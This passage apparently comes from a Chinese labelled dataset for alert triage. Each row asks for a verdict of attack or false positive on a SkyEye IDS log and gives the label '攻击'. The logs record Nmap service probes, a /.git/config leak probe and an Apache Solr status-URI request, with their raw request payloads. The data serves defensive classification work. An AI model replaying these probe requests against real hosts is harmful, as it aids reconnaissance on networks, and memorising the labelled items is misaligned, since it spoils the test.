"攻击者可通过Nmap获悉目标端口的状态及端口上运行服务的详细信息,并针对开启的端口进行攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732646423", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "161.35.17.177", "public_date": "2023-03-17 16:10:21", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/nice ports,/Trinity.txt.bak", "src_mac": "00:94:a1:5e:6e:87", "file_name": "Tri%6Eity.txt%2ebak", "confidence": "中", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "39", "h_proto_version": "HTTP/1.0\n\n", "serial_num": "QbJK/8ze/", "uri": "/nice%20ports%2C/Tri%6Eity.txt%2ebak", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002057c", "req_header": "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "161.35.17.177", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567932-发现黑客工具Nmap扫描行为", "rule_labels": "{\"0x100809\": {\"parent_id\": \"0x100800\", \"type\": \"扫描器名称\", \"name\": \"Nmap\", \"parent_name\": \"Web漏洞扫描\"}}", "host_md5": "d41d8cd98f00b204e9800998ecf8427e", "sport": "18927", "h_url": "/nice%20ports%2C/Tri%6Eity.txt%2ebak"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732646409", "vlan_id": "", "vuln_type": "发现黑客工具Nmap扫描行为", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732646409, "rule_name": "发现黑客工具Nmap扫描行为", "hit_field": "", "description": "1", "dip": "172.23.64.208", "protocol_id": 6, "hit_end": 67, "uri": "", "cnnvd_id": "", "dport": 80, "rule_version": "3.0.1122.14572", "hit_start": 47, "detail_info": "NMap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。", "packet_size": 277, "appid": 103, "proto": "sip", "xff": "", "sip": "161.35.17.177", "attack_method": "远程", "affected_system": "", "sig_id": 1742, "sport": 33219, "bulletin": "nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。"}, "hit_start": "47", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAAEHtjJAAC0G9wKhIxGxrBdA0IHDAFAk3Mce5BPl/1AY+vApyQAAT1BUSU9OUyBzaXA6bm0gU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1RDUCBubTticmFuY2g9Zm9vDQpGcm9tOiA8c2lwOm5tQG5tPjt0YWc9cm9vdA0KVG86IDxzaXA6bm0yQG5tMj4NCkNhbGwtSUQ6IDUwMDAwDQpDU2VxOiA0MiBPUFRJT05TDQpNYXgtRm9yd2FyZHM6IDcwDQpDb250ZW50LUxlbmd0aDogMA0KQ29udGFjdDogPHNpcDpubUBubT4NCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQoNCg=="}, "detail_info": "NMap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 02:40:09", "hazard_level": "2", "hazard_rating": "低危", "rule_name": "发现黑客工具Nmap扫描行为", "packet_data": "ACSs3Z37AJShXm6HCABFAAEHtjJAAC0G9wKhIxGxrBdA0IHDAFAk3Mce5BPl/1AY+vApyQAAT1BUSU9OUyBzaXA6bm0gU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1RDUCBubTticmFuY2g9Zm9vDQpGcm9tOiA8c2lwOm5tQG5tPjt0YWc9cm9vdA0KVG86IDxzaXA6bm0yQG5tMj4NCkNhbGwtSUQ6IDUwMDAwDQpDU2VxOiA0MiBPUFRJT05TDQpNYXgtRm9yd2FyZHM6IDcwDQpDb250ZW50LUxlbmd0aDogMA0KQ29udGFjdDogPHNpcDpubUBubT4NCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQoNCg==", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.23.64.208", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "8746f0bd236d171ec2e19e5348645060", "proto": "sip", "xff": "", "alarm_id": "20241127_b3d744f79af6dcec6fe31cdcc028c186", "attack_chain": "0x01050000", "access_time": "2024-11-27 02:40:09", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "140E0000", "description": "1", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732646410", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "161.35.17.177", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "恶意软件", "super_attack_chain": "0x01000000", "hit_end": "67", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x4ef7", "attack_org": "", "is_white": "0", "packet_size": "277", "alarm_sample": "1", "appid": "103", "attack_sip": "161.35.17.177", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "20215-发现黑客工具Nmap扫描行为", "rule_labels": "{}", "sig_id": "1742", "host_md5": "", "sport": "33219", "bulletin": "nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732646407", "vlan_id": "", "vuln_type": "发现NMAP探测行为(SMB)", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732646407, "rule_name": "发现NMAP探测行为(SMB)", "hit_field": "", "description": "1", "dip": "172.23.64.208", "protocol_id": 6, "hit_end": 221, "uri": "", "cnnvd_id": "", "dport": 80, "rule_version": "3.0.1122.14572", "hit_start": 201, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 222, "appid": 140, "proto": "smb", "xff": "", "sip": "161.35.17.177", "attack_method": "远程", "affected_system": "", "sig_id": 2540, "sport": 11857, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "201", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAADQtidAAC0G90ShIxGxrBdA0C5RAFCFJWlB4l8qfFAY+vBLWgAAAAAApP9TTUJyAAAAAAgBQAAAAAAAAAAAAAAAAAAAQAYAAAEAAIEAAlBDIE5FVFdPUksgUFJPR1JBTSAxLjAAAk1JQ1JPU09GVCBORVRXT1JLUyAxLjAzAAJNSUNST1NPRlQgTkVUV09SS1MgMy4wAAJMQU5NQU4xLjAAAkxNMS4yWDAwMgACU2FtYmEAAk5UIExBTk1BTiAxLjAAAk5UIExNIDAuMTIA"}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 02:40:07", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(SMB)", "packet_data": "ACSs3Z37AJShXm6HCABFAADQtidAAC0G90ShIxGxrBdA0C5RAFCFJWlB4l8qfFAY+vBLWgAAAAAApP9TTUJyAAAAAAgBQAAAAAAAAAAAAAAAAAAAQAYAAAEAAIEAAlBDIE5FVFdPUksgUFJPR1JBTSAxLjAAAk1JQ1JPU09GVCBORVRXT1JLUyAxLjAzAAJNSUNST1NPRlQgTkVUV09SS1MgMy4wAAJMQU5NQU4xLjAAAkxNMS4yWDAwMgACU2FtYmEAAk5UIExBTk1BTiAxLjAAAk5UIExNIDAuMTIA", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.23.64.208", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "5648084eba1847376eb8e0891db1e90e", "proto": "smb", "xff": "", "alarm_id": "20241127_93633e272397d9c30c6cabd9459ea902", "attack_chain": "0x01050000", "access_time": "2024-11-27 02:40:07", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "description": "1", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732646410", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "161.35.17.177", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "221", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b7", "attack_org": "", "is_white": "0", "packet_size": "222", "alarm_sample": "1", "appid": "140", "attack_sip": "161.35.17.177", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "22967-发现NMAP探测行为(SMB)", "rule_labels": "{}", "sig_id": "2540", "host_md5": "", "sport": "11857", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732646406", "vlan_id": "", "vuln_type": "发现NMAP探测行为(SSL)", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732646406, "rule_name": "发现NMAP探测行为(SSL)", "hit_field": "", "description": "1", "dip": "172.23.64.208", "protocol_id": 6, "hit_end": 163, "uri": "", "cnnvd_id": "", "dport": 80, "rule_version": "3.0.1122.14572", "hit_start": 143, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 164, "appid": 19, "proto": "ssl", "xff": "", "sip": "161.35.17.177", "attack_method": "远程", "affected_system": "", "sig_id": 2539, "sport": 13595, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "143", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAACWS8NAAC0GYeOhIxGxrBdA0DUbAFAx9CD14PCWoVAY+vB9CQAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI="}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 02:40:06", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(SSL)", "packet_data": "ACSs3Z37AJShXm6HCABFAACWS8NAAC0GYeOhIxGxrBdA0DUbAFAx9CD14PCWoVAY+vB9CQAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI=", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.23.64.208", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "080dec8ea9ca5610b8cef83553bbf7ec", "proto": "ssl", "xff": "", "alarm_id": "20241127_70f9110a01df6cf4d575d42d4bf66f36", "attack_chain": "0x01050000", "access_time": "2024-11-27 02:40:06", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "description": "1", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732646410", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "161.35.17.177", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "163", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b6", "attack_org": "", "is_white": "0", "packet_size": "164", "alarm_sample": "1", "appid": "19", "attack_sip": "161.35.17.177", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "22966-发现NMAP探测行为(SSL)", "rule_labels": "{}", "sig_id": "2539", "host_md5": "", "sport": "13595", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732646406", "vlan_id": "", "vuln_type": "发现NMAP探测行为(SSL)", "attack_type": "信息泄露", "dip_group": "省公司", "is_web_attack": "0", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732646406, "rule_name": "发现NMAP探测行为(SSL)", "hit_field": "", "description": "1", "dip": "172.23.64.208", "protocol_id": 6, "hit_end": 163, "uri": "", "cnnvd_id": "", "dport": 110, "rule_version": "3.0.1122.14572", "hit_start": 143, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 164, "appid": 19, "proto": "ssl", "xff": "", "sip": "161.35.17.177", "attack_method": "远程", "affected_system": "", "sig_id": 2539, "sport": 13595, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "143", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37ACSsIoQzCABFAACW+K5AAEAGofehIxGxrBdA0DUbAG7h525wu8I651AYOQjCTQAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI="}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 02:40:06", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(SSL)", "packet_data": "ACSs3Z37ACSsIoQzCABFAACW+K5AAEAGofehIxGxrBdA0DUbAG7h525wu8I651AYOQjCTQAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI=", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.7", "alarm_source": "天眼分析平台-8", "alarm_sip": "172.23.64.208", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "231c4c62028023b0976e4c0fd0c2f1c7", "proto": "ssl", "xff": "", "alarm_id": "20241127_3f015ced4a3471afd4f5e907a4844c80", "attack_chain": "0x01050000", "access_time": "2024-11-27 02:40:06", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "description": "1", "dip_addr": "中国--湖南省--长沙市", "dport": "110", "alert_devip": "172.31.191.8", "rsp_status": "", "update_time": "1732646371", "branch_id": "QbJK/fzEi", "att_ck": "", "sip": "161.35.17.177", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/jYtc", "src_mac": "00:24:ac:22:84:33", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "163", "serial_num": "QbJK/jYtc", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b6", "attack_org": "", "is_white": "0", "packet_size": "164", "alarm_sample": "1", "appid": "19", "attack_sip": "161.35.17.177", "rule_state": "green", "asset_group": "省公司", "ioc": "22966-发现NMAP探测行为(SSL)", "rule_labels": "{}", "sig_id": "2539", "host_md5": "", "sport": "13595", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732646400", "vlan_id": "", "vuln_type": "发现NMAP探测行为(RDP)", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732646400, "rule_name": "发现NMAP探测行为(RDP)", "hit_field": "", "description": "1", "dip": "172.23.64.208", "protocol_id": 6, "hit_end": 85, "uri": "", "cnnvd_id": "", "dport": 80, "rule_version": "3.0.1122.14572", "hit_start": 65, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 96, "appid": 41, "proto": "t_120", "xff": "", "sip": "161.35.17.177", "attack_method": "远程", "affected_system": "", "sig_id": 2541, "sport": 22465, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "65", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFAABS4atAAC0GzD6hIxGxrBdA0FfBAFBh1ERu3HJhM1AY+vC1uAAAAwAAKiXgAAAAAABDb29raWU6IG1zdHNoYXNoPW5tYXANCgEACAADAAAA"}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 02:40:00", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(RDP)", "packet_data": "ACSs3Z37AJShXm6HCABFAABS4atAAC0GzD6hIxGxrBdA0FfBAFBh1ERu3HJhM1AY+vC1uAAAAwAAKiXgAAAAAABDb29raWU6IG1zdHNoYXNoPW5tYXANCgEACAADAAAA", "hit_field": "", "sip_addr": "德国--黑森州--美因河畔法兰克福", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.23.64.208", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "d529733b47944b6c355f1395b5fdb46b", "proto": "t_120", "xff": "", "alarm_id": "20241127_195c0271180ada0cf38dd63d077b8f6e", "attack_chain": "0x01050000", "access_time": "2024-11-27 02:40:00", "attack_addr": "德国--黑森州--美因河畔法兰克福(50.110809/8.687473)", "type_chain": "16160000", "description": "1", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732646380", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "161.35.17.177", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "85", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b8", "attack_org": "", "is_white": "0", "packet_size": "96", "alarm_sample": "1", "appid": "41", "attack_sip": "161.35.17.177", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "22968-发现NMAP探测行为(RDP)", "rule_labels": "{}", "sig_id": "2541", "host_md5": "", "sport": "22465", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732643239", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732643239, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "18.175.175.158", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 51166}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgOTsgRzgxNDEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS83Ni4wLjM4MDkuMTExIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtQ2hhcnNldDogdXRmLTgNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KQ29ubmVjdGlvbjogY2xvc2UNCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "www.hn.sgcc.com.cn", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "www.hn.sgcc.com.cn/.git/config", "first_access_time": "2024-11-27 01:47:19", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "英国--英格兰--伦敦", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "aefb13f7687a63b6c810725ae214d042", "proto": "http", "xff": "", "alarm_id": "20241127_3dcd4249aae6b154fab85c91917e3f84", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 01:47:19", "attack_addr": "英国--英格兰--伦敦(51.513816/-0.121887)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732643218", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "18.175.175.158", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "accept-charset": "utf-8", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (Linux; Android 9; G8141) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "18.175.175.158", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Generic_Android/G8141\", \"os\": \"Android/9\", \"software\": \"Chrome Mobile/76.0.3809\", \"hw_type\": \"PC\"}}", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "sport": "51166", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Linux; Android 9; G8141) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732641662", "vlan_id": "", "vuln_type": "Apache Solr 信息泄露漏洞", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732641662, "vuln_harm": "可能导致网站敏感信息泄露等", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.243", "site_app": "", "hit_end": 127, "uri": "/solr/admin/cores?action=STATUS&wt=json", "dport": 80, "vuln_name": "Apache Solr 信息泄露漏洞", "rsp_status": 0, "code_language": "", "solution": "目前官方已经发布新版本修改了该漏洞,建议您升级到对应的最新的版本。", "hit_start": 107, "detail_info": "Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等\r\n\r\n该系统存在任意文件读取漏洞,参数stream.url未过滤导致可以读取任意文件。", "xff": "", "sip": 